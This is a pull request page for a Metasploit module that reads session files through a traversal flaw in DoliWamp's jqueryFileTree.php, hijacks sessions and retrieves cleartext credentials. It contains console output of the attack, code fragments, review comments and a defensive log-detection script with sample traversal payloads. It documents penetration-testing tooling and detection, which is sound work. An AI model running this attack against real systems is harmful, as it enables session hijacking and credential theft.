Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from Feb 10, 2014

@bcoles
Contributor

bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.


Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed
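As an added, defender-side example that is not part of this PR or the module: a small Python detector that flags access-log requests to jqueryFileTree.php whose query parameters carry a directory-traversal sequence, including percent- and double-percent-encoded forms. The log lines, the Dolibarr path and the `dir` parameter name are constructed assumptions, not values taken from the page.

```python
# Flag access-log entries that look like traversal against jqueryFileTree.php.
# Added example; the sample lines, path and 'dir' parameter are constructed.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log sample (assumed format, not from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [03/Feb/2014:10:00:01 +0000] "GET /dolibarr/jqueryFileTree.php?dir=/images/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2014:10:00:07 +0000] "GET /dolibarr/jqueryFileTree.php?dir=../../../../tmp/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2014:10:00:09 +0000] "GET /dolibarr/jqueryFileTree.php?dir=..%2F..%2F..%2F..%2Ftmp%2F HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Feb/2014:10:00:12 +0000] "GET /dolibarr/jqueryFileTree.php?dir=%252e%252e%252f%252e%252e%252ftmp HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Feb/2014:10:00:20 +0000] "GET /dolibarr/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Dot-dot followed by a forward or back slash, checked after full decoding.
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')


def fully_decode(value, max_rounds=3):
    # Peel repeated percent-encoding (%252e -> %2e -> .) so that a
    # double-encoded sequence is judged by the form the server would see.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_attempt(target):
    # Only requests whose path is the jqueryFileTree connector are of interest.
    parts = urlsplit(target)
    if not parts.path.lower().endswith('jqueryfiletree.php'):
        return False
    # parse_qs already decodes one layer; fully_decode handles the rest.
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        if any(TRAVERSAL_RE.search(fully_decode(v)) for v in values):
            return True
    return False


def find_traversal_hits(log_text):
    # Return (client ip, status, request target) for each suspicious line.
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group('target')):
            hits.append((m.group('ip'), m.group('status'), m.group('target')))
    return hits


if __name__ == '__main__':
    for ip, status, target in find_traversal_hits(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

A 200 response on a flagged request is the line worth escalating, since it means the connector answered the traversed listing rather than rejecting it.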
+ vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
+ return user_id
+ else
+ # print_debug("#{peer} - Could not hijack session. Session is invalid.")
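Review bot: the commented-out `print_debug` in the `else` branch leaves the failure path silent, so a run in which every token is rejected gives the operator no indication of why. Suggest replacing it with `vprint_status("#{peer} - Could not hijack session. Session is invalid.")` so the message appears under VERBOSE, matching the `vprint_good` used on the success branch.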


@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

Did you mean to leave this commented out? Looks like useful info for debugging purposes.


+ # Check for session tokens in 'tmp'
+ #
+ def check
+ get_session_tokens ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown
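Review bot: `check` returns `Exploit::CheckCode::Unknown` whenever `get_session_tokens` comes back empty, which conflates "no session files could be read" (a strong sign the traversal is not exploitable) with "the probe could not tell". `Unknown` is meant for cases where the probe itself failed, for example on a timeout, and since `get_session_tokens` does not surface that distinction, the falsy branch should return `Exploit::CheckCode::Safe`. A non-empty result already proves the traversal read succeeded, so `Vulnerable` on the truthy branch is justified.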


@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

You should only be using Unknown when you've failed to collect some info during the process due to a timeout or something. Your get_session_tokens method doesn't really return that type of info, so all you can do is flag it Safe here.


@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014


Contributor

wchen-r7 commented Feb 10, 2014

Processing.

wchen-r7 added a commit that referenced this pull request Feb 10, 2014

@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014

1 check passed: The Travis CI build passed.

Contributor

wchen-r7 commented Feb 10, 2014

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   

@bcoles bcoles deleted the bcoles:doliwamp_traversal_creds branch Apr 6, 2014
